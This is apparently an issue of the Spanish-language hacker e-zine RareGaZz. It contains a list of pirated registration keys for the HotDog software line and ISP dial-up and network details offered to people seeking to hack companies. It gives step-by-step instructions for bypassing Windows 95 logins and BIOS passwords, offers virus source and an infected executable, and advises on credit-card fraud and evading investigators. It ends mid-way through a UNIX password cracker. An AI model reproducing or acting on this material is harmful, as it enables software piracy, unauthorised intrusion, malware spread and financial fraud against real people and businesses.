 SUBMIT Este elemento se utiliza cuando se a llenado la forma y esta lista
 para ser enviada. Ejemplo:

 <input type="submit" value="Mandar la forma">

 Un ejemplo completo de como una forma seria es el siguiente ejemplo tomado
 de la pagina de la revista raregaz en la seccion log-in :)

<FORM><FORM METHOD="POST" ACTION="/cgi-bin/homestead/mail.pl?raregazz">
Nombre____ <INPUT TYPE="text"><BR>
E-Mail_____ <INPUT TYPE="text"><BR>
Ciudad,Pas_ <INPUT TYPE="text"><br>
Comentarios <INPUT TYPE="text"><p>
<INPUT TYPE="submit" VALUE="Mandar">
<INPUT TYPE="reset" VALUE="Volver a Empezar"><p>
</FORM>

 The End
 ~~~~~~~

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

                                   >-C0D3Z-<
                          "Im too sexy for my warez"

 RareGaZz manda la casa por la ventana y gasta mas de 200 dolares en darles
 placer a sus lectores con los siguientes codigos...NNOOOTTT!!!
 Gracias a un colaborador anonimo ponemos a tu mano los siguientes codigos
 para registrar casi toda la linea de software creado por la Cia. sausage
 creadores del famoso editor de HTML HotDog. Para poner tu mano sobre estos
 programas mientras dura la oferta apunta y dispara tu navegador a
 www.sausage.com donde podras encontrarlos en la seccion de software.
 ~~~~~~~~~~~~~~~
Bookworm
Sirve para crear "jump boxes" Java

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0MVLQQVWV6RZXCCAE9YP

------------------ end -------------------

Broadway
Crea Java Marquess

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0RBQMUNC08APMYNLK5YT

------------------ end -------------------

Clikette
Botones 3D

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 04RN4FE74M0P5JC7P728

------------------ end -------------------

Crosseye 1
Crea mapas graficos (supongo usando java)

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0J4HVC98ZAKXK1CH4JZY

------------------ end -------------------

Upgrade Egor 1 or 2 --> Egor 3
Egor es un animador de graficos basado en Java, si ya tienes el 1 o 2 este
es el codigo para registrar el upgrade...

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0R5BBAC60TB0BXHC4XR9

------------------ end -------------------

FrameGang 1
quieres poner frames a tu pagina? este programa es lo que necesitas! 

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 007NTFEF3615EV1J7JAM

------------------ end -------------------

Flash 2
Texto Scrolling

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0FVN3BJZRVRLMBHUV6CY

------------------ end -------------------

Site FX
applets java compactos para efectos graficos

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0MH2DTCYRDHJE8440UR4

------------------ end -------------------

Swami
Programa para animar texto usando Java [ keewwl ]

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0MW1Q2RNWKKJTBYFNE2W

------------------ end -------------------

Upgrade HD Std 16 1 or 2 --> HD Pro 3 (for Win95)
Upgrade del hotdor standard al profesional

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0QRLZND3XAJX7MN97T40

------------------ end -------------------

Weenie - Bang
Graficos animados

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 02UKMA9YRY91QH5PL9A3

------------------ end -------------------

Weenie - Bullets
Graficos animados

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 00EN2YWF3CUBQXF6W05P

------------------ end -------------------

Weenie - Critters
Graficos animados

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0K6UZVDRCFRTKK6FN9NT

------------------ end -------------------

Upgrade HotDog Pro 1 - HotDog 16 bit v2

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 03B13NQX8N29LD72EL78

------------------ end -------------------

HotDog 16 bit v2
Duh?

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 05U0B6MFBF8U0XUYFCYP

------------------ end -------------------

Weenie - Spinners
Graficos animados

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0FEWBQLTU91LHJRZ9BC4

------------------ end -------------------

Upgrade HotDog Std 1 or 2 --> HotDog 16 bit v2

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0HZYUR6TPDTTL6Q4L2WA

------------------ end -------------------

Upgrade HotDog Pro 32 v1 --> HD Pro 3 (for Win95)

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0HUE668CCJ8BBLTDNKM0

------------------ end -------------------

Upgrade HD Pro 16 v1 --> HD Pro 3 (for Win95)

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0RFFKFZX0VU494ZNALM0

------------------ end -------------------

Upgrade HD Pro 16 v2 --> HD Pro 3 (for Win95)

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 05YWKJFMQB0R1XY2PMYM

------------------ end -------------------

Upgrade HD Std 32 --> HD Pro 3 (for Win95)

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0HQTBW1935AY8DARB358

------------------ end -------------------

Weenie - Wierd Faces
Graficos animados

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 08MYPT2FMKUFL1CNBYD9

------------------ end -------------------

Egor 3
poderosa aplicacion para crear applets java

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0M64BBWTVLKEBE9U0CC2

------------------ end -------------------

HotDog Professional 3 (for Windows95)
Uno de los mejores editores de HTML

---------------- cut here ----------------
User Name: emilio carrion
Serial Number: 0FDYL11D6F82BH65HR70

------------------ end -------------------

 Los programas piden el codigo de registro que debera ser copiado usando
 COPY -- PASTE en el cuadro que el programa lo indique incluyendo TODO lo
 que esta entre las lineas cut here y end incluyendo el espacio en blanco.

 Codigo adicional sin costo extra!
 Neobook Professional: 1251418CKNHPOI

--> raregazz, su editor o cualquiera de sus colaboradores no se hacen
    responsables del uso y publicacion de estos codigos asi como de la manera
    en que estos hayan sido obtenidos. No existe forma alguna de saber quien
    los envio (lo hicieron usando remailers) y cualquier problema con estos
    codigos NO debera ser tratado con nosotros. Todos estos codigos estan
    probados y si funcionan. Por favor no email preguntando como funcionan
    o como se usan estos programas.

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

  TTTTTTTTTTTTTTT 
  TTTTTTTTTTTTTTT                                          XXX        XXX
        TTT                                                 XXX     XXX
        TTT      UU     UU  CCCCCC     AA       NNNN   NN     XXX XXX
        TTT      UU     UU  CC        AA AA     NN NN  NN       XXXX
        TTT      UU     UU  CC       AAAAAAA    NN  NN NN     XXX XXX
        TTT      UU     UU  CC      AA     AA   NN   NNNN   XXX     XXX
        TTT       UUUUUUU   CCCCCC AA       AA  NN    NNN  XXX        XXX


Que ondas es la primera vez que mando algo a la revista y espero les sirva.
Ahi les van algunos numeros, scripts y servidores a todos los compas que
leen la revista y quieren intentar hackear a alguna compaia esto les puede
servir:

 ****************************************************************************

Datos de Compunet:

Prestadora del servicio:

compunet.com.mx

Nombre de la cuenta: ??????
Password: ??????

PRIMARY DNS: 207.248.192.11
SECONDARY: 207.248.192.12
POP SERVER: 207.248.197.6
SMTP SERVER: 207.248.197.6
NNTP SERVER: 207.248.197.6

Telefonos de acceso:

76-25-10 , 76-27-25 , 77-10-24 , 77-09-80 , 77-34-08 , 77-34-09 , 
77-16-57 , 77-16-34 .

 [ una vez dentro de este sistema solamente se presentan algunos directorios
   y no aparece el directorio /etc por lo que a primera vista parece ser un
   "servidor seguro"                                                        ]

 ****************************************************************************

Datos de Telnor:

Prestadora del servicio:

telnor.net

Nombre de la cuenta: ??????
Password: ??????

PRIMARY DNS: 200.23.249.1
SECONDARY: 200.23.248.1
SMTP: email.telnor.net { parece que cambio por dns.telnor.net } [ uhh?? ]
Gateway: 200.23.249.3
Netmask: 255.255.255.0

Telefono de acceso:

        76-33-01

 [ Notas: servicio llleeeennnntttttiiiisssssiiiiimmmmmooooo y la mayoria de
   las veces esta ocupado el numero telefonico. alguien tiene el passwd? ]

****************************************************************************

Datos de Cetys:

Prestadora del servicio:

orca.ens.cetys.mx

Nombre de la cuenta: ??????
Password: ??????

Aqui es necesario usar trumpet winsock y obtener los datos de una cuenta.
[ been there, done that! ] Lo siguiente es el login.cmd y bye.cmd necesarios
para conectarte a traves de internet cetys.
{ solo lo que esta entre asteriscos }. Donde dice username y password debes
de poner el nombre de la cuenta y el password respectivamente.

-------------------------------login.cmd--------------------------------------
 ****************************************************************************

# Multiple number redial script Sample for Trumpet Winsock
# Written by TucanX (TucanX@gratismail.com)
# Modificado para cetys universidad, campus ensenada por
# TucanX (TucanX@gratismail.com)

# Definiciones
$access1 = "745300"
$access2 = "745301"
$username = "???????"
$password = "???????"
$pppcomand = "ppp"
$id_prompt = "!login: "
$pw_prompt = "Password:"
$srvc_prompt = "bye]:"
$online_prompt = "tun"
$addr_leadin = "Your IP address is "
%access_nums = 4
%busy_limit = 3
%bad_limit = 3
%total = %busy_limit + %access_nums
%tries = 0
%busy = 0
%bad = 0
%pass = 0
%reset = 0
$goodbye = "no"
$reset = "atz"
$init = "ats11=55s7=35"
$access = $access1

#deshabilite la siguiente linea si desea ver el resultado de los 
#comandos en el puerto de comunicaciones
echo off

#presentacion
display "Script de acceso PPP v3.0" \n 
display "Cetys universidad, Campus Ensenada" \n
display "Programado por TucanX (TucanX@gratismail.com)" \n
display "En base a codigo por TucanX (TucanX@gratismail.com)" \n
display "Gracias a Raretrip y la revista RareGaZz" \n
display " Adios"
sleep 3
 
#Obtener Username y Password. Estos seran enviados al servidor al 
#conectarse
query $username "Teclee su nombre de usuario en orca"
password "Teclee el password para su cuenta en orca"

#Proceso de entrada con varios Modems
repeat

  if ! %reset
    display \n"Inicializando el modem... " \n
    output $reset\r
    input 30 OK\n
    output $init\r
    input 30 OK\n
    %reset = 1
  end

  if %access_nums > 1 & $access = "bad"
    %loops = 0
    repeat
      %pass = %pass + 1
      if %pass = 1
        $access = $access2
      end
   
      if %pass = %access_nums
        $access = $access1
        %pass = 0
      end
      %loops = %loops +1
      if %loops > %access_nums
        $goodbye = "No se encontraron numeros libres - abortando..."
      end
    until $access <> "bad" | $goodbye <> "no"
  end
  
  if %tries = %total + 3
    $goodbye = "\n Se alcanzo el limite de reintentos - abortando...\n "
  end

  if $goodbye <> "no"
    display \n$goodbye\7\n
    display \n"Por favor intente de nuevo mas tarde."
    display \n\n"Script de enlace Cetys universidad, Campus ensenada."\n
    display "Programado por TucanX en base a codigo"\n
    display "por TucanX."\n
    display \n"gracias por usar este servicio..."\n
    output +++\r
    output ath0\r
    abort
  end

  $goodbye = "no"
  %connect = 0
  %tries = %tries + 1
  display \n"Intento #"%tries\n
  sleep 1
  display \n"Marcando..."\n
  display $access \n
  outputecho atdt $access\r
  $modem = ""
  while $modem = ""
    %dummy = [read 35 $modem]
  end 
  
  $result = copy($modem, 1, 10)
  if $result = "BUSY"
    %bad = %bad + 1
    if %access_nums > 1
      if $access = $access1
        $access1 = "bad"
      end
      if $access = $access2
        $access2 = "bad"
      end
      if %bad = %access_nums
        $goodbye = "No se encontraron lineas libres - Abortando..."
      else
        display \n"La lnea" $access "se encuentra ocupada."\n
        $access = "bad"
        %reset = 0
      end
    else
      if %bad > %bad_limit - 1
        $goodbye = "Se alcanzo el limite de NO CARRIER  - abortando..."
      else
        %reset = 0
      end
    end  
  end

  $result = copy($modem, 1, 4)
  if $result = "NO CARRIER"
    %busy = %busy + 1
    if %busy = %busy_limit 
      $goodbye = " No se encontraron numeros libres - abortando... "
    end
  end

  $result = copy($modem, 1, 7)
  if $result = "CONNECT" | $result = "CARRIER"
#    wait 30 dcd
    display "Servidor orca PPP... acceso logrado. " \n
    display "EN LINEA... iniciando protocolo de entrada..." \n 
    output \13
    %connect = 1
  end

  if $modem <> "NO CARRIER" & $modem <> "BUSY" & %connect = 0
    display \n"Evento no esperado - reintentando..."\n
  end

  # log current attempt data to .ini file  
  $section = "current"
  save %tries $section 
  save %busy $section 
  save %bad $section 
  save $modem $section 

until %connect

# Una vez lograda la coneccion, script para login, password y protocolo

# Identificacion de usuario (login:)
input 30 $id_prompt
output $username\13
display \n"Mandando identificacion de usuario..." \n

# Clave de acceso (password:)
input 30 $pw_prompt
display \n"Mandando password... "\n
output $password\13

# Opcion de menu PPP
input 30 $srvc_prompt
display \n"Inicializando protocolo..."\n
output $pppcomand\13
display " EN LINEA... puede lanzar ahora sus aplicaciones de Internet" \n
display " para cerrar la coneccion seleccione DIALLER/BYE " \n
# Espera a que el proceso este listo
# input 30 $online_prompt
# Read the IP number
# online
# display \n"Negociando direccion IP..."\n
# address 30
# input 30 \n
# $addr_leadin
# display \n" En linea... Tu direccion IP es \i \n

 ****************************************************************************

----------------------------------bye.cmd-------------------------------------
 ****************************************************************************

display \n"cancelando..."\n
# echo off
set dtr off
sleep 1
set dtr on
if ![input 2 \n]
  output +++
  if [input 3 OK\n]
    display \n\n"Script de enlace Cetys universidad, Campus ensenada."\n
    display "Programado por TucanX en base a codigo"\n
    display "por TucanX."\n
    display \n"gracias por usar este servicio..."\n

    output ath0\r
  end
end

 ****************************************************************************

Telefono de acceso:

        74-53-00 , 74-53-01

 ****************************************************************************

Datos de Red Tecnologica Nacional (RTN):

Prestadora del servicio:

rtn.net.mx

Nombre de la cuenta: ??????
Password: ??????

PRIMARY DNS: ????????????
SECONDARY: ????????????
SMTP: rtn.net.mx
Gateway: 200.34.68.254      <-- Supuestamente un BackBone de MCI
Netmask: ?????????????

Telefono de acceso:

   5283939

 ****************************************************************************

 Espero y esto los ayude para cualquier comentario escribir a:
 tucanx@gratismail.com

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<

Ŀ
            COMO CRACKER CUALQUIER SISTEMA BASADO EN WINDOWS 95            
Ĵ
                               Por: Guybrush                               
Ĵ
                        E-Mail: guybrush@axis.org                          


Ŀ
                                  INDICE                                   


        0-Introduccion

        1-Por que no sirve el Windows 95 como sistema multiusuario?

        2-Es facil cracker el Windows 95?
           2.1-Como hacerlo
           2.2-Nos lo ponen algo dificil
           2.3-Saltando todas las barreras

        3-Despedida

Ŀ
                             0-INTRODUCCION                                


Hay muchos articulos que hablan sobre Unix, Internet y otros temas ya muy
vistos (como mi anterior articulo, que espero que hayas leido)  :)
Para variar un poco os voy a hablar del famoso y polemico 'Windows 95'.
Vereis que se pueden hacer algunas cosas con el (cuando no se cuelga)  X-DDD

Ŀ
       1-POR QUE NO SIRVE EL WINDOWS 95 COMO SISTEMA MULTIUSURIO?         


Los que venis de Windows 3.x habreis notado una gran mejora tanto en el
entorno como en la multitarea. La verdad es que el Windows 3.x no tenia
multitarea, asi que esto es algo que se agradece bastante en el Windows 95.
Pero sigue estando el problema de que el nucleo del Windows es el indestruc-
tible MS-DOS. Si, no conseguimos librarnos de el. Por problemas de compatibi-
lidad de programas, tanto Windows 3.x como Windows 95 estan funcionando bajo
MS-DOS (aunque el 95 lo disimule bien - parece como si el S.O. fuera el Win 95
y el MS-DOS solamente un sub-shell).

Dejando aparte que el Windows 95 aun deja mucho que desear (a pesar de la mul-
tatarea y de las 'multiples' veces que chafa nuestras 'tareas' quedandose col-
gado), tiene el inconveniente de que sus creadores no deben de saber aun lo
que es un sistema operativo 'multiusuario' porque nosotros podemos crear todos
los usuarios que queramos, cada uno con sus contraseas y sus entornos, pero
todos ellos son SUPERUSUARIOS, por lo que cada uno de ellos tiene acceso a
todo el disco duro, lo que quiere decir que puede ver, modificar, ejecurar o
borrar ficheros que no son suyos.

Por tanto, si tienes 'cuenta' en un ordenador con sistema Windows 95, ya eres
el superusuario. Demasiado facil!.  :)

Ŀ
                   2-ES FACIL CRACKEAR EL WINDOWS 95?                     


Ya hemos visto antes que teniendo cuenta, si. Pero que ocurre si no tenemos
cuenta?. Mas claramente para los que aun siguan despistadillos. Que pasa si
encendemos un ordenador, se arranza el Windows 95 y luego nos pide un login
y un password? Como accedemos a ese ordenador?

Ŀ
2.1-COMO HACERLO


Si estas habituado a usar Windows 95 te habras dado cuenta de que cuando apa-
rece el mensaje de 'Iniciando Windows 95' podemos pulsar la tecla F8 tras la
cual nos aparece un menu. Bien, como hemos visto que no tenemos acceso al or-
denador, reseteamos y estamos atentos para pulsar esta tecla al ver el mensa-
je. Ya esta? Ahora elegimos la opcion 6 que es la de acceder al simbolo del
sistema. Ahora entramos en el directorio de Windows y renombramos todos los
archivos cuya extension es '.PWL' que son los archivos de los usuarios con sus
claves correspondientes. Por ejemplo: 'ren *.pwl *.guy'. Ahora volvemos a re-
setear y cuando se arranque Windows nos pedira que introduzcamos un nombre de
usuario y una contrasea para este. Como hemos (aparentemente) eliminado los
ficheros PWL, Windows no encuentra ningun usuario y nos pide que creemos uno
nuevo (como ocurre cuando lo instalamos). Despues de cotillear, borrar, o lo
que quieras hacer, borra el fichero nuevo que se ha creado con extension PWL,
correspondiente al nuevo usuario que has creado y vuelve a renombrar los fi-
cheros anteriores (para que no se den cuenta del cambio). En este caso:
'ren *.guy *.pwl'.

Ŀ
2.2-NOS LO PONEN ALGO DIFICIL


Que ocurriria si al arrancar Windows pulsaramos F8 y no pasara nada? Esta
estropeada la tecla F8? No, no es eso. Lo que ocurre es que ese menu que ofre-
ce Windows puede desactivarse. Pero antes de deciros como se activa os dire
que podeis tambien arrancar con un disco llave y una vez que hallais accedido
en modo MS-DOS, repetis el procedimiento anterior: entrar en el directorio
Windows, renombrar ficheros, etc. Luego sacais el disco y reseteais.
Para volver a poner los ficheros como estaban se hace exactamente lo mismo.

Aunque no es necesario, os dire como activar/desactivar el menu F8. Para ello
teneis que modificar el fichero msdos.sys (el que no domine el MS-DOS mejor
que haga una copia antes de este fichero). Supongo que el que este leyendo
esto es lo bastante listo como para saber que ese fichero es oculto y solo de
lectura. Uhmmmm no sabes como editarlo y modificarlo? Usa el attrib (si eres
tan lamer como para no saber usarlo, aprende antes MS-DOS).

Bueno, debajo de donde pone [Options] debes aadir BootKeys=0 para desactivar
el menu de inicio. Para activarlo dale el valor 1, o simplemente elimina esa
linea.

Ŀ
2.2-SALTANDO TODAS LAS BARRERAS


Mas dificil todavia. Y si esta el menu de inicio desactivado? Recurrimos a
arrancar con un disco llave. Pero que ocurriria si la BIOS esta configurada
para que primero lea la unidad C y luego la A (osea que no se puede arrancar
desde disquete)? Lo primero que haria cualquiera (por lo menos yo) es entrar
en la configuracion de la BIOS y modificar esta opcion para que arranque pri-
mero desde la unidad A. Pero ... sorpresa! tiene contrasea!. Debemos saltar
esta contrasea si queremos acceder a ese disco duro. Aunque hay algunas BIOS
faciles de crackear (simplemente ejecutando un pequeo programa te dice cual
es la contrasea) en este caso no lo podemos hacer ya que este programa no lo
podriamos ejecutar (ni desde el disco duro ni desde la disquetera).

Solo nos queda una solucion (un poco arriesgada, pero ... el que algo quiere
algo le cuesta). Abrimos el ordenador y desconectamos los 2 cables que sumi-
nistran corriente a la placa base. Cuando los volvamos a conectar, la BIOS es-
tara configurada por defecto y, por supuesto, sin contrasea.

Ŀ
                                8-DESPEDIDA                                


Esto es todo por hoy. espero que te halla servido de ayuda y que me escribas
si tienes alguna duda. Tambien me gustaria que me corrigierais si es que me
he confundido en algo.

Un saludo.

>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<
******************************************************************************
>[\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/][\/]<


                               B O O M E R A N G
                               ^~^~^~^~^~^~^~^~^
               "Tu linea de comunicacion segura con el underground"
                              Mail Boy...RareTrip

 Ultimamente se habia vuelto esta seccion 'no tan segura' por que empezaron
 a aparecer las firmas de las personas que nos escribian por un error de la
 persona que le tocaba hacer esta seccion el numero pasado.
 Ya no se preocupen, de ahora en adelante su nombre o handle no volvera a
 aparecer en esta seccion a menos que ustedes especifiquen lo contrario.
 Las preguntas que aqui aparecen son solamente las que le puedan interesar
 a otras personas y no todos los mensajes que recibimos.

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

                                   !!URGENTE!!
 Muchos colaboradores que publican su direccion de correo en esta revista se
 ven atacados por individuos que aun no identificamos. Estas personas se hacen
 pasar por nosotros y dan instrucciones para ejecutar virus o cosas asi.
 Nosotros *nunca* enviaremos a ningun lector o colaborador un archivo, si
 tenemos que hacerles llegar algun ejecutable lo pondremos en la pagina web.
 Para todos aquellos que recibieron mail pidiendo que se comunicaran con
 nosotros a otras direcciones no hagan caso! Las unicas direcciones que pueden
 usar para escribirnos es raregazz@bigfoot.com para alcanzar a todos los que
 ayudan a la revista o a raretrip@cyberdude.com por si tienes algun mensaje
 personal hacia mi. Solo confien mensajes de nosotros cuando sean respuestas
 a mensajes suyos o esten firmados con nuestra *nueva* llave pgp. La firma
 debera ser verificada usando la llave que esta en nuestra pagina web.

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

 Ustedes como parte de la revista tienen que decidir que hacer con esta
 situacion, recuerdan el "log-in" de nuestra pagina donde les pedimos sus
 datos entre los que estan su ciudad ?? pues muchos forms nos llegan de la
 misma ciudad y a lo mejor ni se conocen por lo que vamos a tratar de crear
 grupos de minorias en cada ciudad del mundo con las personas que participen
 en este plan piloto. Si nos mandan los datos que les pedimos abajo, nosotros
 vamos a hacerla de 'busca parejas' y cuando dos o mas personas nos manden
 sus datos y coincida la ciudad entonces les avisamos a todos los de la misma
 ciudad y les damos las direcciones de correo electronico para que se pongan
 de acuerdo entre ustedes si se quieren conocer...que opinan?

                To: RareGaZz@Bigfoot.com
           Subject: HACKERZ (en mayusculas y con zeta)
 ----------------------------------------------------------->
            Nombre:
            Ciudad:
            Estado:
              Edad:
 Grado de estudios:
             Email:

 El proposito es crear grupos de aficionados a las redes y pc's que luego con
 el tiempo y experiencia puedan pasar a formar parte de los grupos de hackers
 de habla espaol y asi expandir la cultura hacker a todos los horizontes
 posibles. Tambien les seria util a todos para hacer el clasico intercambio
 de software, passwords y muchas otras cosas.

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

 seria bueno que publicaran el codigo fuente del virus Zhengxi...

 [ El codigo nos lo enviaron (V0V_77) y esta en el archivo incluido con esta
  revista ZHENGXI.ZIP junto con un ejecutable que ya viene infectado. Hasta
  ahora ningun antivirus detecta el ejecutable infectado asi que manejenlo
  con cuidado. Otra cosa, el codigo del virus y el archivo infectado fueron
  conseguidos de la revista espaola (en ingles) 29A que la pueden encontrar
  en http://29a.islatortuga.com/ ]

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

 ATENCION TODOS LOS USUARIOS DE PGP 2.6.2 Internacional:

 Cuando ejecuten el comando: pgp -kg para generar sus llaves pgp tienen 3
 opciones:

Pick your RSA key size:
        1)       384 bits- Casual grade, fast but less secure
        2)       512 bits- Commercial grade, medium speed, good security
        3)      1024 bits- Military grade, very slow, highest security
Choose 1, 2, or 3, or enter desired number of bits: 2048
                                                    ~~~~
 La opcion mas segura es 2048 pero no aparece en el menu de la version
 internacional de Pretty Good Privacy. Si tu copia de PGP no dice RSA sino
 RSAREF solo puedes escoger 1024 bits como maximo para tu llave.
 La nueva llave de RareGaZz es de 2048 para aumentar la seguridad de ustedes
 y la nuestra. Si quieren conseguir las versiones internacionales de PGP
 en la seccion de WareZ de nuestra revista podran encontrar las 2 versiones
 actualmente disponibles (32 bits y 16 bits).

 A todos los que bajaron su copia de PGP de nuestra pagina pueden seguir
 usandola para encriptar y decriptar mensajes para las llaves de 2048 bits.

 Si quieres conseguir un shell para PGP en Windows o una version PGP para
 Macintosh, FreeBSD o cualquier otro sistema visita la pagina internacional
 de PGP en: http://www.ifi.uio.no/pgp/
 Ahi esta el link para bajar el programa INAS (Is not a Shell) para Windows
 95 que no necesita la version DOS para funcionar. Si les interesa tambien
 pueden conseguir el codigo fuente de PGP.

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

   que tipo de riesgos crea el uso de numeros de tarjetas no autorizadas ?

[ Primero que nada necesitas saber DONDE usar el numero que tengas.

 -Si vas a una tienda de software en internet nunca piden tan solo el numero
  de tarjeta, te piden nombre de usuario y algunas veces su direccion! El
  programa que esta en nuestra seccion de warez (Credit Master v4.0) es
  unicamente para crear numeros verdaderos pero eso no quiere decir que la
  tarjeta exista. El programa usa los algoritmos de las distintas compaias
  y es util en algunas paginas porno que solo permiten la entrada a mayores
  de edad (comprueban esto pidiendo un numero de tarjeta que pueda ser
  comprobado como verdadero por los algoritmos de las tarjetas).

 -Hay un lugar, creo que es www.rubberchicken.com donde mandan bromas a
  domicilio y hay que pagar tan solo con el numero de tarjeta y fecha de
  expiracion -en especial unas tarjetas de broma- lo que hace facil el ser
  compradas usando un programa generador de numeros validos. La fecha de
  expiracion es una de dos, par o impar, asi que solo hay dos intentos.

 ahora viene lo legal (y tedioso) del asunto...

 hacer esto SI implica fraude bancario, despues de todo estas obteniendo
 software que cuesta dinero y eso alguien tiene que pagarlo. seguramente no
 sera el dueo de la tarjeta pero tampoco la compaia que lo vendio, por lo
 que si el banco que expiro esa tarjeta puede llegar a rastrear esa compra
 estate seguro que lo hara (y lo hacen).
         --> pero cuando nos a detenido algo que sea ilegal? <--

 prevencion de paranoia

 Ahora que si hiciste la compra cuidadosamente y usando los consejos que dimos
 en la revista tu conciencia debe estar tranquila. Si por equivocacion
 recibiste el "producto" usando tu nick borra toda huella de el que pueda
 llevar a alguien investigandolo a tu verdadera identidad. Por ejemplo, si
 recibiste el producto por email a una cuenta de bigfoot ni creas que es
 anonima la direccion destino! en cuanto un banco pida autorizacion para
 revisar registros de esas direcciones...BANG you go down.
 Lo mismo en hotmail y en todos los servicios en linea. si usaste una cuenta
 en hotmail asegurate de no volverla a usar. si quieres volver a hacerlo con
 exito por el momento crea una cuenta en www.gratismail.com y desde que la
 registres hasta que termines de usarla para obtener el "producto" usa el
 www.anonymizer.com (recomiendo que te lleves toda la info a una universidad
 o centro de computo publico y desde ahi hagas todo el show).
 las precauciones son importantes por que si no cuando quieras pasar un dia
 alegre en compaia de...digamos una amiga no podras estar seguro pensando
 que en cualquier momento podrian llegar los perjudiciales a tu casa tumbando
 la puerta pistola en mano... jeh :-) ]

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

 ustedes dijeron en algun numero anterior varios trucos para evadir la
 seguridad en windows 95 y aqui les tengo otro que aprendi de chiripa :
 Renombra el archivo c:\windows\logos.sys a cualquier cosa y 1 de cada 25
 veces que termines una sesion de windows desde el menu inicio saldras al
 prompt DOS...

[ Este hack fue probado y comprobado en varias computadoras y seguramente
  les servira a todos los que usen windows 95 en el trabajo. Lo malo es que
  eso de 1 de cada 25 no es cierto, bien podria ser 1 de 50... ]

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

  Que ondas con eso de "el gran hermano te esta vigilando" que esta en las
 paginas de hackers por todos lados (Big Brother) ?

 [ La linea "Big Brother is watching you" es usada en la mayoria de las
  paginas de hackers aunque la mayoria no sabe ni que diablos significa. Como
  en raregazz nos jactamos de saberlo (o averiguarlo) todo >:-> les vamos a
  dar una pequea catedra -aun gratuita- sobre lo que significa ese slogan
  y el origen... -ahi pa'que no digan los de la SEP-

                                    -=1984=-
  George Orwells escribio un libro llamado 1984 donde describia una sociedad
  donde no existia la privacidad ni la libertad del pensamiento (semejanzas?).
  Existia en esa civilizacion (o deberia decir imbecivilizacion) el jefe
  supremo que era llamado "El gran hermano".
  En esa sociedad existia si no me equivoco, una "policia del pensamiento" que
  se encargaba de regular a todos los rebeldes de la epoca. Una vez capturados
  los 'insurgentes' eran llevados a campos de tortura donde los hacian quedar
  como vegetales por el resto de sus dias (lease escuelas y academias).
  El estado controlaba y vigilaba por medio de unas pantallas que deberian
  estar en cada casa y lugar de reuniones (ahora se conocen como televisores)
  y a diferencia de las que nosotros conocemos, estas permitian ver al Estado
  que es lo que hacian las personas del otro lado de la pantalla (un poco como
  el email no crees?). Cada dia eran reglamentarios los "tres minutos de odio"
  en la telepantalla que hacian lo que el futbol en estos dias...

  Si quieres saber como termina un hombre y una mujer libres de pensamiento
  (el hombre no es Zimmerman) que decidieron ir en contra de un Gobierno
  Totalitario, Despota, Fascista, Armamentista y anti-democratico (lo siento
  Fujimori pero no es su gobierno, hablaremos de cobardes y traidores en otro
  numero :-) no dejes de checar este libro y conocer aun mejor la cultura
  hacker y su lema "Libertad de Informacion y Pensamiento".

  1984
  Por George Orwells                                                        ]

 //////////// \\\\\\\\\\\ ////////////  \\\\\\\\\\\\ //////////// \\\\\\\\\\\

 Nombre del codigo: TC.C
     Para Compilar:  gcc -O2 tc.c -o tc
       Descripcion: Programa que tiene la basica funcion de crackear los
                    passwords en un sistema UNIX usando el campo geko, logins
                    y una lista de palabras standard.
..............................................................................

*/

#include <stdio.h> 
#include <string.h> 

#define fetch(a,b,c,d) {fgets(a,130,b); c=strtok(a,":"); d=strtok('\0',":");}

main()
{
FILE *p,*o,*w;
char i[50],pes[130],pas[50],pps[50],pws[50];
char *es=pes,*as=pas,*ps=pps,*ws=pws;

   printf("\nTinyCrack v1.0 Bluesman 1/95 - RaGE Mag Release!\n\n");
   printf("Password File: "); gets(i);
